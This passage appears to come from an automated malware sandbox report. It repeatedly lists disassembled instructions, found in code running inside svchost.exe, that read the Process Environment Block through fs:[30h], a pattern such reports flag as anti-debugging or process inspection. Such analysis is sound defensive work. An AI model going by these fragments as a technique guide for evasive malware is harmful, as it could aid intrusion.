                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B8243 mov ecx, dword ptr fs:[00000030h]7_2_039B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E0274 mov eax, dword ptr fs:[00000030h]7_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03934260 mov eax, dword ptr fs:[00000030h]7_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03934260 mov eax, dword ptr fs:[00000030h]7_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03934260 mov eax, dword ptr fs:[00000030h]7_2_03934260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392826B mov eax, dword ptr fs:[00000030h]7_2_0392826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A0625D mov eax, dword ptr fs:[00000030h]7_2_03A0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B019F mov eax, dword ptr fs:[00000030h]7_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B019F mov eax, dword ptr fs:[00000030h]7_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B019F mov eax, dword ptr fs:[00000030h]7_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B019F mov eax, dword ptr fs:[00000030h]7_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392A197 mov eax, dword ptr fs:[00000030h]7_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392A197 mov eax, dword ptr fs:[00000030h]7_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392A197 mov eax, dword ptr fs:[00000030h]7_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03970185 mov eax, dword ptr fs:[00000030h]7_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EC188 mov eax, dword ptr fs:[00000030h]7_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EC188 mov eax, dword ptr fs:[00000030h]7_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D4180 mov eax, dword ptr fs:[00000030h]7_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D4180 mov eax, dword ptr fs:[00000030h]7_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A061E5 mov eax, dword ptr fs:[00000030h]7_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE1D0 mov eax, dword ptr fs:[00000030h]7_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE1D0 mov eax, dword ptr fs:[00000030h]7_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE1D0 mov eax, dword ptr fs:[00000030h]7_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE1D0 mov eax, dword ptr fs:[00000030h]7_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F61C3 mov eax, dword ptr fs:[00000030h]7_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F61C3 mov eax, dword ptr fs:[00000030h]7_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039601F8 mov eax, dword ptr fs:[00000030h]7_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DA118 mov ecx, dword ptr fs:[00000030h]7_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DA118 mov eax, dword ptr fs:[00000030h]7_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DA118 mov eax, dword ptr fs:[00000030h]7_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DA118 mov eax, dword ptr fs:[00000030h]7_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F0115 mov eax, dword ptr fs:[00000030h]7_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov eax, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov ecx, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov eax, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov eax, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov ecx, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov eax, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov eax, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov ecx, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov eax, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039DE10E mov ecx, dword ptr fs:[00000030h]7_2_039DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03960124 mov eax, dword ptr fs:[00000030h]7_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392C156 mov eax, dword ptr fs:[00000030h]7_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C8158 mov eax, dword ptr fs:[00000030h]7_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04164 mov eax, dword ptr fs:[00000030h]7_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04164 mov eax, dword ptr fs:[00000030h]7_2_03A04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936154 mov eax, dword ptr fs:[00000030h]7_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03936154 mov eax, dword ptr fs:[00000030h]7_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C4144 mov eax, dword ptr fs:[00000030h]7_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C4144 mov eax, dword ptr fs:[00000030h]7_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C4144 mov ecx, dword ptr fs:[00000030h]7_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C4144 mov eax, dword ptr fs:[00000030h]7_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C4144 mov eax, dword ptr fs:[00000030h]7_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393208A mov eax, dword ptr fs:[00000030h]7_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F60B8 mov eax, dword ptr fs:[00000030h]7_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F60B8 mov ecx, dword ptr fs:[00000030h]7_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039280A0 mov eax, dword ptr fs:[00000030h]7_2_039280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C80A8 mov eax, dword ptr fs:[00000030h]7_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B20DE mov eax, dword ptr fs:[00000030h]7_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392C0F0 mov eax, dword ptr fs:[00000030h]7_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039720F0 mov ecx, dword ptr fs:[00000030h]7_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039380E9 mov eax, dword ptr fs:[00000030h]7_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B60E0 mov eax, dword ptr fs:[00000030h]7_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E016 mov eax, dword ptr fs:[00000030h]7_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E016 mov eax, dword ptr fs:[00000030h]7_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E016 mov eax, dword ptr fs:[00000030h]7_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E016 mov eax, dword ptr fs:[00000030h]7_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B4000 mov ecx, dword ptr fs:[00000030h]7_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D2000 mov eax, dword ptr fs:[00000030h]7_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C6030 mov eax, dword ptr fs:[00000030h]7_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392A020 mov eax, dword ptr fs:[00000030h]7_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0392C020 mov eax, dword ptr fs:[00000030h]7_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03932050 mov eax, dword ptr fs:[00000030h]7_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B6050 mov eax, dword ptr fs:[00000030h]7_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395C073 mov eax, dword ptr fs:[00000030h]7_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039D678E mov eax, dword ptr fs:[00000030h]7_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039307AF mov eax, dword ptr fs:[00000030h]7_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039E47A0 mov eax, dword ptr fs:[00000030h]7_2_039E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393C7C0 mov eax, dword ptr fs:[00000030h]7_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B07C3 mov eax, dword ptr fs:[00000030h]7_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039347FB mov eax, dword ptr fs:[00000030h]7_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039347FB mov eax, dword ptr fs:[00000030h]7_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039527ED mov eax, dword ptr fs:[00000030h]7_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039527ED mov eax, dword ptr fs:[00000030h]7_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039527ED mov eax, dword ptr fs:[00000030h]7_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BE7E1 mov eax, dword ptr fs:[00000030h]7_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930710 mov eax, dword ptr fs:[00000030h]7_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03960710 mov eax, dword ptr fs:[00000030h]7_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C700 mov eax, dword ptr fs:[00000030h]7_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396273C mov eax, dword ptr fs:[00000030h]7_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396273C mov ecx, dword ptr fs:[00000030h]7_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396273C mov eax, dword ptr fs:[00000030h]7_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AC730 mov eax, dword ptr fs:[00000030h]7_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C720 mov eax, dword ptr fs:[00000030h]7_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C720 mov eax, dword ptr fs:[00000030h]7_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03930750 mov eax, dword ptr fs:[00000030h]7_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BE75D mov eax, dword ptr fs:[00000030h]7_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972750 mov eax, dword ptr fs:[00000030h]7_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972750 mov eax, dword ptr fs:[00000030h]7_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B4755 mov eax, dword ptr fs:[00000030h]7_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396674D mov esi, dword ptr fs:[00000030h]7_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396674D mov eax, dword ptr fs:[00000030h]7_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396674D mov eax, dword ptr fs:[00000030h]7_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938770 mov eax, dword ptr fs:[00000030h]7_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940770 mov eax, dword ptr fs:[00000030h]7_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03934690 mov eax, dword ptr fs:[00000030h]7_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03934690 mov eax, dword ptr fs:[00000030h]7_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039666B0 mov eax, dword ptr fs:[00000030h]7_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C6A6 mov eax, dword ptr fs:[00000030h]7_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A6C7 mov eax, dword ptr fs:[00000030h]7_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE6F2 mov eax, dword ptr fs:[00000030h]7_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE6F2 mov eax, dword ptr fs:[00000030h]7_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE6F2 mov eax, dword ptr fs:[00000030h]7_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE6F2 mov eax, dword ptr fs:[00000030h]7_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B06F1 mov eax, dword ptr fs:[00000030h]7_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B06F1 mov eax, dword ptr fs:[00000030h]7_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03972619 mov eax, dword ptr fs:[00000030h]7_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039AE609 mov eax, dword ptr fs:[00000030h]7_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394260B mov eax, dword ptr fs:[00000030h]7_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394E627 mov eax, dword ptr fs:[00000030h]7_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03966620 mov eax, dword ptr fs:[00000030h]7_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968620 mov eax, dword ptr fs:[00000030h]7_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0393262C mov eax, dword ptr fs:[00000030h]7_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0394C640 mov eax, dword ptr fs:[00000030h]7_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03962674 mov eax, dword ptr fs:[00000030h]7_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F866E mov eax, dword ptr fs:[00000030h]7_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039F866E mov eax, dword ptr fs:[00000030h]7_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A660 mov eax, dword ptr fs:[00000030h]7_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A660 mov eax, dword ptr fs:[00000030h]7_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E59C mov eax, dword ptr fs:[00000030h]7_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03932582 mov eax, dword ptr fs:[00000030h]7_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03932582 mov ecx, dword ptr fs:[00000030h]7_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03964588 mov eax, dword ptr fs:[00000030h]7_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039545B1 mov eax, dword ptr fs:[00000030h]7_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039545B1 mov eax, dword ptr fs:[00000030h]7_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B05A7 mov eax, dword ptr fs:[00000030h]7_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B05A7 mov eax, dword ptr fs:[00000030h]7_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039B05A7 mov eax, dword ptr fs:[00000030h]7_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039365D0 mov eax, dword ptr fs:[00000030h]7_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A5D0 mov eax, dword ptr fs:[00000030h]7_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A5D0 mov eax, dword ptr fs:[00000030h]7_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E5CF mov eax, dword ptr fs:[00000030h]7_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396E5CF mov eax, dword ptr fs:[00000030h]7_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E5E7 mov eax, dword ptr fs:[00000030h]7_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039325E0 mov eax, dword ptr fs:[00000030h]7_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C5ED mov eax, dword ptr fs:[00000030h]7_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396C5ED mov eax, dword ptr fs:[00000030h]7_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039C6500 mov eax, dword ptr fs:[00000030h]7_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03A04500 mov eax, dword ptr fs:[00000030h]7_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03940535 mov eax, dword ptr fs:[00000030h]7_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0395E53E mov eax, dword ptr fs:[00000030h]7_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938550 mov eax, dword ptr fs:[00000030h]7_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03938550 mov eax, dword ptr fs:[00000030h]7_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396656A mov eax, dword ptr fs:[00000030h]7_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396656A mov eax, dword ptr fs:[00000030h]7_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396656A mov eax, dword ptr fs:[00000030h]7_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039EA49A mov eax, dword ptr fs:[00000030h]7_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039644B0 mov ecx, dword ptr fs:[00000030h]7_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039BA4B0 mov eax, dword ptr fs:[00000030h]7_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039364AB mov eax, dword ptr fs:[00000030h]7_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_039304E5 mov ecx, dword ptr fs:[00000030h]7_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968402 mov eax, dword ptr fs:[00000030h]7_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968402 mov eax, dword ptr fs:[00000030h]7_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03968402 mov eax, dword ptr fs:[00000030h]7_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0396A430 mov eax, dword ptr fs:[00000030h]7_2_0396A430
